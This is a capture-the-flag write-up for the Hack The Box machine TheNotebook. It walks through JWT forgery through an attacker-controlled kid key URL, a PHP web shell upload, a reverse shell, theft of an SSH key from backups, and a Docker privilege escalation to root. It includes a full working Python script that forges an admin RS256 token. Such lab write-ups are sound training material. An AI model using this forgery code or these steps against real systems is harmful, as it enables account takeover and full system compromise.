🔎🦶Enumeration/Foothold
TheNotebook is a Medium box from HTB created by mostwanted002. This box features a JWT forgery (the server loads its signing key from a URL that the token itself names) and a Docker exploit for privilege escalation. I begin each box by running a RustScan. This is bundled into my setup.sh script, which I've mentioned in a few of my other posts. RustScan with NMAP filters shows a website with registration available on Port 80.
NMAP scan shows registration page available.
I register for the site to gain access:
Easy Sign Up registration.
After checking for a CSRF (Cross-site request forgery) token and running a Dirbuster, I notice an auth cookie present. I go to JWT.io and decode the cookie. The token header references a private key that the server loads from a URL, which means the server trusts whatever key that URL serves.
JWT showing the private key pointing to localhost 7070.
I use ssh-keygen to create a key pair and add it to the JWT.
Creating a key with ssh-keygen.
I change the JWT to reference my public and private keys, update the key URL to hit my local python3 web server (which serves the key file), and change admin_cap to 1. The token must then be re-signed with the new private key so the signature matches the key the server fetches.
After creating the custom token I paste it into Cookie Editor and save the cookie:
Using the Cookie Editor Mozilla Plugin to save my new auth token.
Refreshing the page now gives me the Admin menu entry:
Receiving the privKey.key via newly created auth token.
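The forgery above in code, as an added example that is not from the original post or the box's author. It builds the same kind of cookie seen on the box: an RS256 JWT whose kid header names the URL the server fetches its verification key from, with admin_cap set to 1, signed with a key we generated. The attacker address in KID_URL and the username/e-mail are placeholders; on the box you would serve the ssh-keygen output with python3's http.server instead. RSA key generation and PKCS#1 v1.5 signing are written with the standard library only so the script runs offline, which is a stand-in for the real ssh-keygen/PyJWT tooling, not a copy of it.

```python
import base64
import hashlib
import hmac
import json
import secrets

# DER DigestInfo prefix for SHA-256 (RFC 8017, section 9.2, note 1).
SHA256_DIGESTINFO = bytes.fromhex("3031300d060960864801650304020105000420")

# Assumed attacker listener; on the box the original kid pointed at localhost:7070.
KID_URL = "http://10.10.14.5:7070/privKey.key"

def is_probable_prime(n, rounds=16):
    """Miller-Rabin; plenty for a throwaway signing key."""
    if n < 2:
        return False
    for p in (2, 3, 5, 7, 11, 13, 17, 19, 23, 29, 31, 37):
        if n % p == 0:
            return n == p
    d, r = n - 1, 0
    while d % 2 == 0:
        d, r = d // 2, r + 1
    for _ in range(rounds):
        x = pow(secrets.randbelow(n - 3) + 2, d, n)
        if x in (1, n - 1):
            continue
        for _ in range(r - 1):
            x = pow(x, 2, n)
            if x == n - 1:
                break
        else:
            return False
    return True

def gen_prime(bits):
    while True:
        c = secrets.randbits(bits) | (3 << (bits - 2)) | 1  # top two bits set, odd
        if is_probable_prime(c):
            return c

def gen_rsa_key(bits=1024):
    """Stand-in for ssh-keygen: the key as a dict with n, e, d."""
    e = 65537
    while True:
        p, q = gen_prime(bits // 2), gen_prime(bits // 2)
        n, phi = p * q, (p - 1) * (q - 1)
        if p != q and phi % e:
            return {"n": n, "e": e, "d": pow(e, -1, phi)}

def b64url(data):
    return base64.urlsafe_b64encode(data).rstrip(b"=").decode()

def b64url_decode(text):
    return base64.urlsafe_b64decode(text + "=" * (-len(text) % 4))

def emsa_pkcs1_v15(message, k):
    """EMSA-PKCS1-v1_5 encoding of SHA-256(message), k bytes long."""
    t = SHA256_DIGESTINFO + hashlib.sha256(message).digest()
    return b"\x00\x01" + b"\xff" * (k - len(t) - 3) + b"\x00" + t

def rs256_sign(key, signing_input):
    k = (key["n"].bit_length() + 7) // 8
    em = int.from_bytes(emsa_pkcs1_v15(signing_input, k), "big")
    return pow(em, key["d"], key["n"]).to_bytes(k, "big")

def rs256_verify(key, signing_input, signature):
    k = (key["n"].bit_length() + 7) // 8
    s = int.from_bytes(signature, "big")
    if len(signature) != k or s >= key["n"]:
        return False
    em = pow(s, key["e"], key["n"]).to_bytes(k, "big")
    return hmac.compare_digest(em, emsa_pkcs1_v15(signing_input, k))

def forge_token(key, kid_url, username, email):
    """Build the cookie: kid points at our key, admin_cap is flipped to 1."""
    header = {"typ": "JWT", "alg": "RS256", "kid": kid_url}
    payload = {"username": username, "email": email, "admin_cap": 1}
    parts = [b64url(json.dumps(x, separators=(",", ":")).encode()) for x in (header, payload)]
    signing_input = ".".join(parts)
    return signing_input + "." + b64url(rs256_sign(key, signing_input.encode()))

def kid_of(token):
    """The URL the vulnerable server fetches its verification key from."""
    return json.loads(b64url_decode(token.split(".")[0]))["kid"]

def verify_token(key, token):
    """Server-side check once the key named by kid has been loaded; None on failure."""
    head, body, sig = token.split(".")
    if not rs256_verify(key, f"{head}.{body}".encode(), b64url_decode(sig)):
        return None
    return json.loads(b64url_decode(body))

if __name__ == "__main__":
    key = gen_rsa_key()
    token = forge_token(key, KID_URL, "tester", "tester@example.com")
    print(token, verify_token(key, token))
```

verify_token is what the server ends up doing after it fetches the key from the kid URL: because we chose both the key and the URL, our signature checks out and the admin_cap claim is accepted. The same token is rejected under any key we did not sign with, which is why the fix on the server side is to pin the verification key (or restrict kid to a fixed local key set) and never derive it from a field the client controls.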
I navigate to the Admin Panel and upload a PHP-based web shell:
WSO PHP based webshell in action.
🔝Escalation
I use the web shell's Network tab to get a low-privilege reverse shell and log into the box. I upgrade my shell and download LinPEAS to the box:
LinPEAS and general enumeration show me some files in the /var/backups directory. I use the web shell to download the files to my local machine. One of them is a zipped home directory, home.tar.gz.
Going through home.tar.gz shows me noah's home directory and his SSH key. I save the key to my working directory and log into the box as noah.
Once logged in I check which sudo commands can be run without a password. sudo -l shows I can run docker with elevated privileges.
Googling ‘docker exec exploit’ gives me the following –
I alter the payload line to create a reverse shell, then build the file and start a web server:
⚠ Attack Machine (Tab 1)
Running the Docker exploit.
I launch a secondary SSH session for the noah user and a reverse shell listener on Port 1234 in my fourth tab, and do the following:
⚠ Attack Machine (Tab 2)
🎯Victim Machine (Tab 1)
🎯Victim Machine (Tab 2)
The session dies shortly after (a minute or so). You can switch the payload line to add your SSH key instead, or just pull the flag directly for an easier time.
Rooted TheNotebook by HTB.